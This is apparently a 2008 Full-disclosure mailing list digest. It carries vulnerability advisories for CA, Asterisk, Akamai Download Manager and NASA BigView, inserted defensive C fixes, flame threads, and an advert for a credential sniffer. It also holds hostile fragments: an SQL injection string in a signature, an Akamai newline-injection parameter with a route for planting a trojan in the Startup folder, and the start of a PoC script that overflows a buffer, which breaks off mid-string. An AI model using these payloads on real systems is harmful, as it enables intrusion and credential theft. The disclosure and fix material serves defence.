63int res,max;
.
.
.
115   while( junk == '#' ){
116 getline(fin,lineBuf,512);
117 cout << "Comment:"

Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack Overflow Vulnerability

2008-06-04 Thread Luigi Auriemma
> During the handling of an encoded authentication request, the process
> copies the user-supplied login information into a fixed length stack
> buffer

This one seems exactly the same vulnerability I disclosed in February
2008 and for which I wrote also a testing attack (number 7) in my
doubletakedown proof-of-concept:

  http://aluigi.org/adv/doubletakedown-adv.txt

Anyway it's an old version of Double-Take, so it should not be considered;
in fact I mentioned that old bug in my advisory only for thoroughness
but without the minimal consideration, since the bug was already
found and patched by the same vendor (Double-Take, not HP).


--- 
Luigi Auriemma
http://aluigi.org



Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Valdis . Kletnieks
On Wed, 04 Jun 2008 20:29:05 BST, n3td3v said:
 
> I'm not a troll, i'm a serious security researcher.

Which part of "blogger" makes you a "serious researcher"?

http://lists.grok.org.uk/pipermail/full-disclosure/2008-April/061251.html




Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring Authentication Processing Stack

2008-06-04 Thread M. Shirk

I need to go to your site and take one of your other bugs so I can GET PAID!!

:)

Shirkdog
' or 1=1-- 

http://www.shirkdog.us

> Date: Wed, 4 Jun 2008 21:24:46 +0100
> From: [EMAIL PROTECTED]
> To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
> Subject: Re: [Full-disclosure] ZDI-08-034: HP StorageWorks Storage Mirroring 
> Authentication Processing Stack Overflow Vulnerability
> 
> > During the handling of an encoded authentication request, the process
> > copies the user-supplied login information into a fixed length stack
> > buffer
> 
> This one seems exactly the same vulnerability I disclosed in February
> 2008 and for which I wrote also a testing attack (number 7) in my
> doubletakedown proof-of-concept:
> 
>   http://aluigi.org/adv/doubletakedown-adv.txt
> 
> Anyway it's an old version of Double-Take so should be not considered,
> in fact I mentioned that old bug in my advisory only for thoroughness
> but without the minimal consideration since the bug was already
> found and patched by the same vendor (Double-Take, not HP).
> 
> 
> --- 
> Luigi Auriemma
> http://aluigi.org
> 


[Full-disclosure] CA Secure Content Manager HTTP Gateway Service FTP Request Vulnerabilities

2008-06-04 Thread Williams, James K

Title: CA Secure Content Manager HTTP Gateway Service FTP Request 
Vulnerabilities


CA Advisory Date: 2008-06-03


Reported By: Sebastian Apelt working with ZDI/TippingPoint
 Cody Pierce, TippingPoint DVLabs


Impact: A remote attacker can cause a denial of service or execute 
arbitrary code.


Summary: CA Secure Content Manager contains multiple 
vulnerabilities in the HTTP Gateway service that can allow a 
remote attacker to cause a denial of service condition or execute 
arbitrary code. CA has issued a patch to address the 
vulnerabilities. The vulnerabilities, CVE-2008-2541, occur due to 
insufficient bounds checking on certain FTP requests. An attacker 
can make a request that will cause the service to fail or allow 
the attacker to take privileged action on the system.


Mitigating Factors: None


Severity: CA has given these vulnerabilities a maximum risk rating 
of High.


Affected Products:
CA Secure Content Manager r8


Affected Platforms:
Windows


Status and Recommendation:

CA has issued the following patch to address the vulnerabilities.

CA Secure Content Manager r8:  QO99987


How to determine if you are affected:

Windows:
1. Using a registry editor, determine if the following key exists:
HKEY_LOCAL_MACHINE\Software\ComputerAssociates\Hidden\PatchID\80VULNHOTFIX
2. If the key does not exist, the installation is vulnerable


Workaround: None


References (URLs may wrap):
CA Support:
http://support.ca.com/
Security Notice for CA Secure Content Manager HTTP Gateway Service
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784
Solution Document Reference APARs:
QO99987
CA Security Response Blog posting:
CA Secure Content Manager HTTP Gateway Service FTP Request 
Vulnerabilities
http://community.ca.com/blogs/casecurityresponseblog/archive/2008/06/04.aspx
Reported By: 
Sebastian Apelt working with ZDI/TippingPoint
Cody Pierce, TippingPoint DVLabs
CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-036/
CA ETrust Secure Content Manager Gateway FTP PASV Stack Overflow 
Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-08-035/
CVE References:
CVE-2008-2541 - CA Secure Content Manager multiple FTP buffer 
overflows
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2541
OSVDB References: Pending
http://osvdb.org/


Changelog for this advisory:
v1.0 - Initial Release


Customers who require additional information should contact CA
Technical Support at http://support.ca.com.

For technical questions or comments related to this advisory, 
please send email to vuln AT ca DOT com.

If you discover a vulnerability in CA products, please report your
findings to vuln AT ca DOT com, or utilize our "Submit a 
Vulnerability" form. 
URL: http://www.ca.com/us/securityadvisor/vulninfo/submit.aspx


Regards,
Ken Williams ; 0xE2941985
Director, CA Vulnerability Research


CA, 1 CA Plaza, Islandia, NY 11749

Contact http://www.ca.com/us/contact/
Legal Notice http://www.ca.com/us/legal/
Privacy Policy http://www.ca.com/us/privacy/
Copyright (c) 2008 CA. All rights reserved.



Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix Mars Lander site hacked

2008-06-04 Thread Anders B Jansson
n3td3v wrote:
> I'm not a troll, i'm a serious security researcher.
> 
> I was misrepresented in the media by SecurityFocus Robert Lemos who
> ruined my image.

Except that you are not serious, you are not a researcher and you have
not posted anything ever that has shown any clue whatsoever about security.

It is possible that you are misrepresented but then you are misrepresented
by your own moronic rants.
-- 
// hdw



[Full-disclosure] AST-2008-009: (Corrected subject) Remote crash vulnerability in ooh323 channel driver

2008-06-04 Thread Asterisk Security Team
   Asterisk Project Security Advisory - AST-2008-009

   Product:             Asterisk-Addons
   Summary:             Remote crash vulnerability in ooh323 channel driver
   Nature of Advisory:  Remote crash
   Susceptibility:      Remote unauthenticated sessions
   Severity:            Major
   Exploits Known:      No
   Reported On:         May 29, 2008
   Reported By:         Tzafrir Cohen
   Posted On:           June 4, 2008
   Last Updated On:     June 4, 2008
   Advisory Contact:    Mark Michelson
   CVE Name:            CVE-2008-2543

   Description: The ooh323 channel driver provided in Asterisk Addons used
   a TCP connection to pass commands internally. The payload of these
   packets included addresses of memory which were to be freed after the
   command was processed. By sending arbitrary data to the listening TCP
   socket, one could cause an almost certain crash since the command
   handler would attempt to free invalid memory. This problem was made
   worse by the fact that the listening TCP socket was bound to whatever IP
   address was specified by the "bindaddr" option in ooh323.conf.

   Resolution: The TCP connection used by ooh323 has been replaced with a
   pipe. The effect of this change is that data from outside the ooh323
   process may not be injected.

   Affected Versions:

   Product                     Release Series
   Asterisk Open Source        1.0.x            N/A
   Asterisk Open Source        1.2.x            N/A
   Asterisk Open Source        1.4.x            N/A
   Asterisk Addons             1.2.x            All versions prior to 1.2.9
   Asterisk Addons             1.4.x            All versions prior to 1.4.7
   Asterisk Business Edition   A.x.x            N/A
   Asterisk Business Edition
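The advisory above describes a command handler that took a memory address out of the packet and passed it to free(). The project's fix was to move the channel to a pipe; the following is an added example, not Asterisk's code, of the complementary input-side rule: never let untrusted bytes name a pointer. The message carries only a small integer handle that the handler checks against a table the process itself owns. The wire layout, the table size and every function name here are assumptions made for this example.

```c
/* Added example, not Asterisk's code: a free-command handler that accepts
 * an index into a process-owned table instead of a raw address. Message
 * layout, MAX_CMDS and the function names are assumptions for this
 * example; the project's actual fix was to replace the socket with a pipe. */
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define CMD_FREE   1u
#define MAX_CMDS   8

/* Wire format: fixed size, no pointers. Whatever arrives is copied into
 * this struct and then checked field by field. */
struct cmd_msg {
    uint32_t type;
    uint32_t handle;
};

/* The only pointers this handler will ever free live here. */
static void *cmd_table[MAX_CMDS];

/* Allocate a command object and return its handle, or -1 if the table is full. */
static int cmd_alloc(void)
{
    for (int i = 0; i < MAX_CMDS; i++) {
        if (cmd_table[i] == NULL) {
            cmd_table[i] = malloc(64);
            return cmd_table[i] ? i : -1;
        }
    }
    return -1;
}

/* Handler for bytes read from the command channel. Returns 0 if a valid
 * free command was executed, -1 if the message was rejected. Arbitrary
 * bytes such as "AAAAAAAA", a stale handle or a short read all yield -1;
 * the handler never frees memory the process did not hand out. */
static int handle_cmd(const unsigned char *buf, size_t len)
{
    struct cmd_msg m;

    if (len != sizeof m)                 /* wrong size: not a command */
        return -1;
    memcpy(&m, buf, sizeof m);
    if (m.type != CMD_FREE)              /* unknown command type */
        return -1;
    if (m.handle >= MAX_CMDS)            /* index outside our table */
        return -1;
    if (cmd_table[m.handle] == NULL)     /* never allocated, or already freed */
        return -1;

    free(cmd_table[m.handle]);
    cmd_table[m.handle] = NULL;          /* closes the double-free window */
    return 0;
}

/* Encode a free command for a given handle; returns the message length. */
static size_t encode_free(uint32_t handle, unsigned char *out)
{
    struct cmd_msg m = { CMD_FREE, handle };
    memcpy(out, &m, sizeof m);
    return sizeof m;
}

int main(void)
{
    unsigned char msg[sizeof(struct cmd_msg)];
    int h = cmd_alloc();
    size_t n = encode_free((uint32_t)h, msg);
    int first = handle_cmd(msg, n);                                  /* 0  */
    int second = handle_cmd(msg, n);                                 /* -1 */
    int junk = handle_cmd((const unsigned char *)"AAAAAAAA", 8);     /* -1 */
    return (first == 0 && second == -1 && junk == -1) ? 0 : 1;
}
```

The table lookup is what makes the crash described in the advisory impossible from the outside: even a writer who can reach the channel can only pick among objects the process already intends to free, and only once each.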

[Full-disclosure] AST-2008-009: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

2008-06-04 Thread Asterisk Security Team

[Full-disclosure] TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability

2008-06-04 Thread DVLabs
TPTI-08-05: CA ETrust Secure Content Manager Gateway FTP LIST Stack Overflow Vulnerability
http://dvlabs.tippingpoint.com/advisory/TPTI-08-05
June 4, 2008

-- CVE ID:
CVE-2008-2541

-- Affected Vendors:
Computer Associates

-- Affected Products:
Computer Associates eTrust Secure Content Manager

-- Vulnerability Details:
This vulnerability allows attackers to execute arbitrary code on
vulnerable installations of Computer Associates eTrust SCM.
Authentication is not required to exploit this vulnerability.

The specific flaw exists in the HTTP Gateway service icihttp.exe running
on port 8080.  When issuing a request for an FTP service the process
tries to decorate the contents of the transaction.  In this particular
case, by specifying an overly long response to a LIST command, a stack
buffer can be overflowed.  Successful exploitation can lead to complete
system compromise under the SYSTEM context.

-- Vendor Response:
Computer Associates has issued an update to correct this vulnerability.
More details can be found at:

https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177784

-- Disclosure Timeline:
2008-05-19 - Vulnerability reported to vendor
2008-06-04 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
 * Cody Pierce, TippingPoint DVLabs



[Full-disclosure] Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability

2008-06-04 Thread cocoruder
Akamai Download Manager File Downloaded To Arbitrary Location Vulnerability

by cocoruder([EMAIL PROTECTED])
http://ruder.cdut.net


Summary:

A parameter injection vulnerability exists in Akamai Download
Manager. By exploiting this vulnerability, a remote attacker can make
users download an arbitrary file and save it to an arbitrary location
while they visit a malicious web page. This means an attacker who
successfully exploits this vulnerability can run arbitrary code on the
affected system.


Affected Software Versions:

Akamai Download Manager ActiveX Control 2.2.3.5



Details:

The page "http://dlm.tools.akamai.com/tools/upgrade.html" is a
sample that calls this ActiveX control; its parameter is set as
follows:

<param name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt">

This sets the value of "URL".

However, if we inject other characters into "URL", it is still parsed
successfully. For example:

<param name="URL" value="http://dlm.tools.akamai.com/tools_files/Readme.txt\x0Areferer=http://ruder.cdut.net">

Since the parameter values set by the ActiveX control are saved in a
temporary file in INI format, the value of "referer" is changed in the
above manner.

In addition, the parameter "target" is used to set the location of the
downloaded file. It has the following meanings:

"DESKTOP"   the file will be saved on the desktop
"AUTO"      the file will be saved in Temporary Internet Files
""          ask the user to choose the saving location

Normally the value of "target" can only be set to the above three
values; any other value is filtered.

Nevertheless, the parameter injection vulnerability allows the value of
"target" to be set arbitrarily. If the value is a valid file path,
Akamai Download Manager downloads the target file directly into it
without any user interaction. As a result, an attacker can construct a
malicious web page that downloads an attacker-controlled file to any
location on the user's system.

One possible attack is to download a trojan into the
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
directory, where it will be executed the next time the user logs in to
the system.



How to Reproduce:

An example exploit is available on:

http://ruder.cdut.net/attach/Akamai_DM_Vul/Akamai_DM_Vul_Exploit.html

This exploit will download the following file to your "Startup"
directory with a new name "calc_run.exe":

http://ruder.cdut.net/attach/calc.exe

MD5 Hash:E3FCB903305F8EE5551EA66F5C096737



Solution:

The fixed version is 2.2.3.7, please update your Akamai Download
Manager via the following url:

http://dlm.tools.akamai.com/tools/upgrade.html

Akamai has released an advisory for this vulnerability which is
available on:

http://www.securityfocus.com/archive/1/493077/30/0/threaded



CVE Information:

CVE-2008-1770



Disclosure Timeline:

2008.04.02  Vendor notified via email
2008.04.03  Vendor responded
2008.04.22  The vendor sent me the new edition of the product
2008.04.22  Confirmed the vulnerability had been fixed correctly
2008.05.12  The vendor had released the fixed edition silently, and
            did not inform me or release a public advisory
2008.05.12  Asked them for the reason
2008.05.12  Vendor replied: "Once we are sure that all of our customers
            have been given the opportunity to upgrade, we will post a
            public advisory"
2008.05.12  Decided to give them a maximum of two weeks for pushing
            the patch
2008.06.02  Sent a warning of the coming independent advisory, and
            asked the vendor to join us
2008.06.02  Vendor asked for an additional 48 hours for coordinated
            public disclosure
2008.06.04  Coordinated vulnerability disclosure



--EOF--

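The mechanism in cocoruder's advisory is a classic line-oriented injection: the control validates "target" on its own, but then writes every parameter as a key=value line, so a line feed smuggled inside "URL" becomes a second "target" line that the validation never saw. The following is an added example written for this digest, not cocoruder's or Akamai's code. Parameter names and the three permitted target values are taken from the advisory; the INI layout, the rule that the last matching line wins, and all function names are assumptions, not Download Manager's real file format.

```c
/* Added example, not cocoruder's or Akamai's code: a naive key=value
 * writer that lets a newline in one value inject another key, beside a
 * writer that refuses control characters. Layout and lookup rule are
 * assumptions for this example. */
#include <stdio.h>
#include <string.h>

struct param {
    const char *key;
    const char *value;
};

/* The filter the advisory describes: target may only be one of three values. */
static int target_allowed(const char *t)
{
    return strcmp(t, "DESKTOP") == 0 || strcmp(t, "AUTO") == 0 || t[0] == '\0';
}

/* Naive writer: emits key=value lines without inspecting the values. */
static int write_ini_unsafe(char *out, size_t cap, const struct param *p, size_t n)
{
    size_t used = 0;
    for (size_t i = 0; i < n; i++) {
        int w = snprintf(out + used, cap - used, "%s=%s\n", p[i].key, p[i].value);
        if (w < 0 || (size_t)w >= cap - used)
            return -1;                      /* would not fit */
        used += (size_t)w;
    }
    return (int)used;
}

/* Hardened writer: a key or value carrying CR or LF (or '=' in a key)
 * can never be one line, so it is rejected before anything is written.
 * Returns -2 on rejection. */
static int write_ini_safe(char *out, size_t cap, const struct param *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        if (strpbrk(p[i].key, "\r\n=") || strpbrk(p[i].value, "\r\n"))
            return -2;
    }
    return write_ini_unsafe(out, cap, p, n);
}

/* Minimal reader: value of the LAST line whose key matches (assumed rule).
 * Returns 1 and copies the value into val if found, else 0. */
static int ini_get(const char *ini, const char *key, char *val, size_t cap)
{
    size_t klen = strlen(key), flen = 0;
    const char *found = NULL, *line = ini;

    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line);
        if (len > klen && strncmp(line, key, klen) == 0 && line[klen] == '=') {
            found = line + klen + 1;
            flen = len - klen - 1;
        }
        if (!eol)
            break;
        line = eol + 1;
    }
    if (!found)
        return 0;
    if (flen >= cap)
        flen = cap - 1;
    memcpy(val, found, flen);
    val[flen] = '\0';
    return 1;
}

/* Simulates the control: target is validated, both parameters are
 * persisted, and the effective target is read back. Returns 0 and fills
 * target_out on success, -2 if the hardened writer rejected the input,
 * -1 on any other failure. */
static int effective_target(const char *url, const char *target, int hardened,
                            char *target_out, size_t cap)
{
    char ini[1024];
    const struct param p[2] = { { "target", target }, { "URL", url } };
    int rc;

    if (!target_allowed(target))
        return -1;
    rc = hardened ? write_ini_safe(ini, sizeof ini, p, 2)
                  : write_ini_unsafe(ini, sizeof ini, p, 2);
    if (rc < 0)
        return rc;
    return ini_get(ini, "target", target_out, cap) ? 0 : -1;
}

int main(void)
{
    char t[256];
    /* Constructed attack value: a legitimate URL followed by an injected
     * line. The target filter never sees it because it travels in URL. */
    const char *inj = "http://example.invalid/Readme.txt\n"
                      "target=C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup";

    effective_target("http://example.invalid/Readme.txt", "AUTO", 0, t, sizeof t);
    printf("benign, naive writer:   target=%s\n", t);
    effective_target(inj, "AUTO", 0, t, sizeof t);
    printf("injected, naive writer: target=%s\n", t);
    printf("injected, safe writer:  rc=%d\n", effective_target(inj, "AUTO", 1, t, sizeof t));
    return 0;
}
```

Validating each parameter against its own allow-list is necessary but not sufficient; the serialisation boundary has to reject anything that would break the one-value-per-line invariant, or the check is bypassed by any other field that shares the file.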


Re: [Full-disclosure] [offtopic] Fwd: Comments on: Phoenix MarsLander site hacked

2008-06-04 Thread Patrick Nolan
> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
> Sent: Wednesday, June 04, 2008 12:29 PM
> 
> I'm not a troll, i'm a serious security researcher.
> 

A few articles or counter-articles
http://www.theregister.co.uk/2006/10/23/linguist_fingers_security_troll/page2.html

http://blogs.ittoolbox.com/security/dmorrill/archives/security-trolls-n3td3v-12460

> I was misrepresented in the media by SecurityFocus Robert 
> Lemos who ruined my image.
> 
> The findings have been post,
> 
> http://smear-campaign-against-n3td3v.blogspot.com/2007/12/smear-campaign-against-n3td3v.html
> 
> All the best,
> n3td3v


Other links of non-interest...

http://ph33r.org/updates/2006/10/20/n3td3v-true-identity-finally-discovered.html

http://sunbeltblog.blogspot.com/2006/10/hunt-for-n3td3v.html

http://www.hackerfactor.com/papers/who_is_n3td3v.pdf


.=Pn.



Re: [Full-disclosure] CORE-2008-0425 - NASA BigView Stack Buffer Overflow

2008-06-04 Thread root
Take this, Luigi "no fix" Auriemma!


CORE Security Technologies Advisories wrote:
> 
>   Core Security Technologies - CoreLabs Advisory
>   http://www.coresecurity.com/corelabs/
> 
>NASA BigView Stack Buffer Overflow
> 
> 
> *Advisory Information*
> 
> Title: NASA BigView Stack Buffer Overflow
> Advisory ID: CORE-2008-0425
> Advisory URL: http://www.coresecurity.com/?action=item&id=2304
> Date published: 2008-06-04
> Date of last update: 2008-06-03
> Vendors contacted: NASA Ames Research Center
> Release mode: Coordinated release
> 
> 
> *Vulnerability Information*
> 
> Class: Stack Overflow
> Remotely Exploitable: Yes (client side)
> Locally Exploitable: No
> Bugtraq ID: 29517 
> CVE Name: CVE-2008-2542   
> 
> 
> *Vulnerability Description*
> 
> NASA BigView [1] allows for interactive panning and zooming of images of
> arbitrary size on desktop PCs running Linux. Using this software, one
> can explore (on relatively modest machines) images such as the Mars
> Orbiter Camera mosaic [92160x33280 pixels].
> 
> The BigView package suffers from a stack buffer overflow when parsing
> specially crafted (invalid) PNM input files. If successful, a malicious
> third party could trigger execution of arbitrary code within the context
> of the application, or otherwise crash the whole application. The
> vulnerability is caused due to the BigView package not properly checking
> the line length of the ascii PNM input files before copying it on a
> stack buffer. This can be exploited to get arbitrary code execution by
> opening a specially crafted file.
> 
> Exploitation of the PNM overflow problem requires the user to explicitly
> open a malicious file. The user should refrain from opening files from
> untrusted third parties or accessing untrusted Web sites until the patch
> is applied.
> 
> 
> *Vulnerable Packages*
> 
> . BigView revision 1.8.
> . Older BigView versions could be affected too, but they were not tested.
> 
> 
> *Non-vulnerable Packages*
> 
> . Available through BigView website (since June 2nd 2008, see below).
> 
> 
> *Vendor Information, Solutions and Workarounds*
> 
> The NASA BigView team has published a new version fixing this
> vulnerability. The tarball is available on BigView's website:
> http://opensource.arc.nasa.gov/project/bigview/
> 
> 
> *Credits*
> 
> This vulnerability was discovered and researched by Alfredo Ortega, from
> CORE IMPACT's Exploit Writing Team (EWT), Core Security Technologies.
> 
> 
> *Technical Description / Proof of Concept Code*
> 
> The BigView package suffers from a stack buffer overflow when parsing
> specially crafted (invalid) PNM input files. If successful, a malicious
> third party could trigger execution of arbitrary code within the context
> of the application, or otherwise crash the whole application.
> 
> The vulnerability resides in the following code at 'Ppm/ppm.C'. Here,
> the function 'getline()' reads data from a file into a buffer. This is
> the complete function:
> 
> /---
> 
> static void getline(int fin, char* lineBuf, int len)
> {
>   bool done=false;
>   int index=0;
>   lineBuf[index]=' ';
>   while(! done){
>     lineBuf[index] = getOneChar(fin);
>     if( lineBuf[index]==10 ) {
>       lineBuf[index]=0;
>       done=true;
>     }
>     ++index;
>   }
>   lineBuf[index]=0;
> }
> 
> ---/
> 
> Clearly the function requires the length of the destination buffer, but
> it is never used internally. This function is used on the
> 'PPM::ppmHeader()' function, to read the header of the PPM file.
> 
> /---
> 
> PPM::ppmHeader(string filename, PPM::Format* format,
>int* cpp, int* bpc,
>int* sizeX, int* sizeY,
>int* imageOffset)
> {
>   std::ostringstream err;
>   char magic[3],lineBuf[512],junk;
>   int res,max;
>   ...
>   while( junk == '#' ){
>     getline(fin,lineBuf,512);
>     cout << "Comment:" << lineBuf << endl;
>     junk = getOneChar(fin);
>   }
> 
> ---/
> 
> Here, the 'lineBuf' buffer is allocated on the stack, with a size of 512
> bytes. If the PPM contains a line longer than 512 bytes on the header, a
> buffer overflow will ensue. The following proof of concept is a python
> script that creates a PNM file that triggers the overflow and jumps to
> an arbitrary position (0x41414141 on the PoC) when loaded with BigView
> compiled on Ubuntu 6.06 LTS.
> 
> /---
> 
> ## BigView exploit
> ## Alfredo Ortega - Core Security Exploit Writers Team (EWT)
> ## Works against BigView "browse" revision 1.8 compiled on ubuntu 6.06
> Desktop i386
> 
> import struct
> w = open("crash.ppm","wb")
> w.write("""P3
> #CREATOR: The GIMP's PNM Filter Version
> 1.0AAA
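The getline() quoted in the CORE advisory takes a 'len' argument and never reads it, so a PNM comment line longer than the 512-byte lineBuf in PPM::ppmHeader() runs straight off the end of the stack frame. The same class of bug, an attacker-chosen line length copied into a fixed stack buffer, is what the CA Secure Content Manager FTP LIST advisory earlier in this digest describes. The following is an added example, not NASA's or Core's code: a bounded replacement that honours the length, keeps the stream position correct, and tells the caller the real line length so an oversized header can be rejected rather than silently clipped. getOneChar keeps the advisory's name and contract; getline_safe, read_line_from_bytes and overlong_comment are names chosen for this example, and feeding bytes through a pipe is only a way to exercise the descriptor-based interface offline.

```c
/* Added example, not NASA's or Core's code: a bounded getline for the
 * BigView PNM header parser. getOneChar mirrors the advisory's helper;
 * the other names and the pipe-based harness are assumptions made here. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Same contract as the advisory's getOneChar(fin): next byte from the
 * descriptor, or -1 at end of stream (treated below like end of line). */
static int getOneChar(int fin)
{
    unsigned char c;
    if (read(fin, &c, 1) != 1)
        return -1;
    return c;
}

/* Bounded getline: stores at most len-1 bytes plus the terminator, but
 * keeps consuming the stream up to the newline so the caller's position in
 * the header is unchanged. Returns the true line length (bytes before the
 * newline, stored or not) so a caller can refuse a header line that did
 * not fit. Returns -1 if the stream ended before any byte was read or len
 * is unusable. */
static long getline_safe(int fin, char *lineBuf, int len)
{
    long total = 0;
    int stored = 0;
    int c;

    if (len <= 0)
        return -1;
    while ((c = getOneChar(fin)) != -1 && c != 10) {
        if (stored < len - 1)
            lineBuf[stored++] = (char)c;
        total++;                         /* counted even when not stored */
    }
    lineBuf[stored] = '\0';
    return (c == -1 && total == 0) ? -1 : total;
}

/* Example helper: push constructed bytes through a pipe and read one line
 * into a 512-byte buffer, the size BigView uses for lineBuf. Returns what
 * getline_safe returned; *stored receives strlen(out). */
static long read_line_from_bytes(const char *data, size_t n, char out[512],
                                 size_t *stored)
{
    int fds[2];
    long total;

    if (pipe(fds) != 0)
        return -2;
    /* n is far below the pipe capacity, so this write cannot block. */
    if (write(fds[1], data, n) != (ssize_t)n) {
        close(fds[0]);
        close(fds[1]);
        return -2;
    }
    close(fds[1]);
    total = getline_safe(fds[0], out, 512);
    close(fds[0]);
    *stored = strlen(out);
    return total;
}

/* Constructs a PNM comment line of '#' followed by n 'A's, in the spirit
 * of the advisory's crash.ppm, and parses it with the bounded routine. */
static long overlong_comment(size_t n, size_t *stored)
{
    char out[512];
    char *line = malloc(n + 3);
    long total;

    if (!line)
        return -2;
    line[0] = '#';
    memset(line + 1, 'A', n);
    line[n + 1] = '\n';
    line[n + 2] = '\0';
    total = read_line_from_bytes(line, n + 2, out, stored);
    free(line);
    return total;
}

int main(void)
{
    size_t stored;
    long total = overlong_comment(600, &stored);
    printf("line length %ld, stored %zu bytes, buffer intact\n", total, stored);
    return 0;
}
```

A caller in ppmHeader() would compare the returned length against sizeof lineBuf and fail the parse when the line was longer; truncating silently is safe for the stack but can still hide a malformed header.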

[Full-disclosure] Akamai Technologies Security Advisory 2008-0001 (Download Manager)

2008-06-04 Thread Akamai Security Team
Akamai Technologies Security Advisory 2008-0001


* Akamai ID: 2008-0002
* Date:  2008/04/20
* Product Name:  Download Manager
* Affected Versions: < 2.2.3.6
* Fixed Version: 2.2.3.7
* CVE IDs:   CVE-2008-1770
* CVSS Base Score:   (AV:R/AC:H/Au:NR/C:C/I:C/A:C/B:N) 8.0

* Product Description:

Akamai Download Manager is a client software application that helps
users download content easily, quickly, and reliably.  It is available
as an ActiveX component or Java applet and provides users the ability
to pause, resume downloading at a later time, and automatically
recover from dropped connections or system crashes.


* Vulnerability Description:

Akamai has become aware of a security vulnerability within the Akamai
Download Manager up to and including version 2.2.3.5 of the ActiveX
control.  For successful exploitation, this vulnerability requires a
user to be convinced to visit a malicious URL put into place by an
attacker. This may then lead to an unauthorized download and automatic
execution of arbitrary code run within the context of the victim user.

This vulnerability exists only in the Download Manager client
software and does not affect Akamai's services in any way.


* Patch Instructions:

For ActiveX versions:
Affected users can upgrade to the latest version of Akamai Download
Manager by visiting the following web page:

http://dlm.tools.akamai.com/tools/upgrade.html

Visiting that page or any other Download Manager enabled page will
prompt the user to install the latest version of the software
automatically.  Akamai has successfully coordinated with each of our
enterprise customers to ensure that all are distributing the patched
version.

To verify the correct version is installed:

  1) In Internet Explorer, choose "Internet Options..." from the
     "Tools" menu.

  2) Under the "General" tab, select "Settings..." from the "Temporary
     Internet files" section.

  3) Select "View Objects..." from the "Temporary Internet files
     folder" section.

  4) Find the item for "DownloadManager Control" and verify that the
     version is "2.2.3.5" or higher.

  * If you wish to uninstall Download Manager, complete this last step:

  5) Find the item for "DownloadManager Control", right-click and
     select "Remove".

  6) When prompted to confirm, choose "Yes".

For Java versions: The Java version is not persistently installed. No
action is required by the user.


* Credit:

CVE-2008-1770 was independently discovered and brought to Akamai's
attention by FortiNet (http://fortinet.com).


* Additional Information:

CVE-2008-1770

* About Akamai:

Akamai® is the leading global service provider for accelerating
content and business processes online. Thousands of organizations have
formed trusted relationships with Akamai, improving their revenue and
reducing costs by maximizing the performance of their online
businesses. Leveraging the Akamai EdgePlatform, these organizations
gain business advantage today, and have the foundation for the
emerging Web solutions of tomorrow. Akamai is "The Trusted Choice for
Online Business." For more information, visit www.akamai.com.

Our public key:

http://www.akamai.com/dl/akamai/Akamai_Security_General.pub




[Full-disclosure] next generation sniffer

2008-06-04 Thread inter inter
[0x4553-Intercepter] offers the following features:

   + Sniffing passwords\hashes of the types:
     ICQ\IRC\AIM\FTP\IMAP\POP3\SMTP\LDAP\BNC\SOCKS\HTTP\WWW\NNTP\CVS\TELNET\MRA\DC++\VNC\MYSQL\ORACLE
   + Sniffing chat messages of ICQ\AIM\JABBER\YAHOO\MSN\GADU-GADU\IRC\MRA
   + Promiscuous-mode scanning + ARP scanning + DHCP discovering
   + Changing MAC address of LAN adapters
   + Raw mode (with filtering rules)
   + eXtreme mode
   + Capturing packets and post-capture (offline) analyzing
   + Remote traffic capturing via RPCAP daemon
   + Built-in arp poison module
   + Reconstruction of SMTP\POP3 messages

Works on Windows NT(2K\XP\2k3\Vista).



Re: [Full-disclosure] Gadi Evron not a troll but n3td3v is?

2008-06-04 Thread n3td3v
On Wed, Jun 4, 2008 at 10:47 PM, Anders B Jansson <[EMAIL PROTECTED]> wrote:
> n3td3v wrote:
>> I'm not a troll, i'm a serious security researcher.
>>
>> I was misrepresented in the media by SecurityFocus Robert Lemos who
>> ruined my image.
>
> Except that you are not serious, you are not a researcher and you have
> not posted anything ever that has shown any clue whatsoever about security.
>
> It is possible that you are misrepresented but then you are misrepresented
> by your own moronic rants.
> --
> // hdw
>

Why does Gadi Evron get good press and n3td3v get bad press? We both
rant our crap on the mailing lists and don't really know what we're
talking about, and both of us have no technical knowledge on any of
the topics we rant about, and we both have news groups for posting
news articles on.

All the best,

n3td3v
